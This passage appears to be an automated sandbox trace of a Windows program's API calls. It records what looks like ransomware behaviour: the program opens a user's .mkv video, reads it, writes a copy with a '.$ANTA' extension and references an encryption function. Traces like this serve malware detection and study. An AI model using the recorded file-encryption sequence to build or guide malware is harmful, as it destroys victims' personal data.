returned 0x43e2540 [0098.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0098.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0098.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9c68 | out: hHeap=0x1780000) returned 1 [0098.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0098.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0098.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0098.001] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac2c0 | out: hHeap=0x1780000) returned 1 [0098.001] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0098.001] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0098.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0098.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9b90 [0098.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0098.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0098.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0098.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0098.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2550 [0098.001] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2550 | out: hHeap=0x1780000) returned 1 [0098.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0098.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43ed3b0 [0098.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca370 [0098.001] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0098.002] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\9ua4aLpWeNEQZn vUIUd.mkv" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\9ua4alpweneqzn vuiud.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0098.002] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0098.002] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0098.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0098.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0098.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0098.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0098.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9b90 | out: hHeap=0x1780000) returned 1 [0098.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0098.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0098.002] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0098.002] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0098.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0098.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0098.002] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796de8 [0098.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0098.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796de8 | out: hHeap=0x1780000) returned 1 [0098.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0098.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0098.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0098.003] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac500 | out: hHeap=0x1780000) returned 1 [0098.003] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0098.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0098.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0098.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0098.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0098.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0098.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0098.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0098.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0098.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f08 [0098.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f08 | out: hHeap=0x1780000) returned 1 [0098.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0098.003] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0098.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0098.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0098.003] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0098.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0098.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0098.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2580 [0098.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0098.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0098.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0098.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0098.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0098.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0098.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0098.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0098.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0098.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0098.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0098.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369f80 [0098.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3b8 | out: hHeap=0x1780000) returned 1 [0098.004] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369fd8 [0098.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0098.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0098.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca388 | out: hHeap=0x1780000) returned 1 [0098.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0098.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0098.004] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0098.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369f80 | out: hHeap=0x1780000) returned 1 [0098.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0098.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca2e0 | out: hHeap=0x1780000) returned 1 [0098.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0098.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0098.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369c10 [0098.005] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc")) returned 0x10 [0098.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369c10 | out: hHeap=0x1780000) returned 1 [0098.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0098.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369fd8 | out: hHeap=0x1780000) returned 1 [0098.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0098.005] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0098.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0098.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x4506008 [0098.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2e0 [0098.005] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0098.005] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Videos\\KW4s-- cgXZEZC\\9ua4aLpWeNEQZn vUIUd.mkv.$ANTA" (normalized: "c:\\users\\fd1hvy\\videos\\kw4s-- cgxzezc\\9ua4alpweneqzn vuiud.mkv.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0098.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0098.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0098.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0098.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0098.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0098.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca460 | out: hHeap=0x1780000) returned 1 [0098.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf900 | out: hHeap=0x1780000) returned 1 [0098.006] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0098.006] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0098.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0098.006] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0098.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0098.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0098.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0098.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0098.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0098.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac540 [0098.007] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac540 | out: hHeap=0x1780000) returned 1 [0098.007] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0098.007] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0098.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0098.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0098.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0098.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0098.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0098.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0098.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0098.007] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0098.007] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0098.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0098.008] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0098.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0098.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0098.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0098.008] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e09020 [0098.011] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0098.011] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x9e42, lpOverlapped=0x0) returned 1 [0098.013] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0098.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0098.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0098.013] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3a0 | out: hHeap=0x1780000) returned 1 [0098.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0098.013] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x9e42) returned 0x4516010 [0098.014] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e09020 | out: hHeap=0x1780000) returned 1 [0098.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca298 | out: hHeap=0x1780000) returned 1 [0098.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca340 | out: hHeap=0x1780000) returned 1 [0098.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0098.017] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0098.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0098.017] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x9e42) returned 0x451fe60 [0098.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0098.018] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0098.018] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0098.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0098.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0098.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2580 [0098.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0098.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x9e42) returned 0x4516010 [0098.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0098.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0098.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0098.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca238 | out: hHeap=0x1780000) returned 1 [0098.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf9a0 | out: hHeap=0x1780000) returned 1 [0098.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0098.019] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0098.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0098.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0098.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0098.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0098.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0098.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0098.019] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0098.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0098.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0098.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d90 [0098.019] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0098.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d90 | out: hHeap=0x1780000) returned 1 [0098.019] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0098.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0098.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2540 [0098.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0098.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0098.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0098.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0098.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x9e42) returned 0x4516010 [0098.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0098.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2580 [0098.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0098.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0098.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0098.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25e0 [0098.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0098.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0098.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0098.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2620 [0098.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca388 [0098.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0098.020] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0098.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3a0 [0098.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0098.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0098.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0098.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0098.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0098.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x9e42) returned 0x4529cb0 [0098.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0098.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0098.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0098.022] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca400 | out: hHeap=0x1780000) returned 1 [0098.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0098.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0098.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0098.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0098.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0098.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0098.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0098.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0098.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0098.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0098.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0098.022] 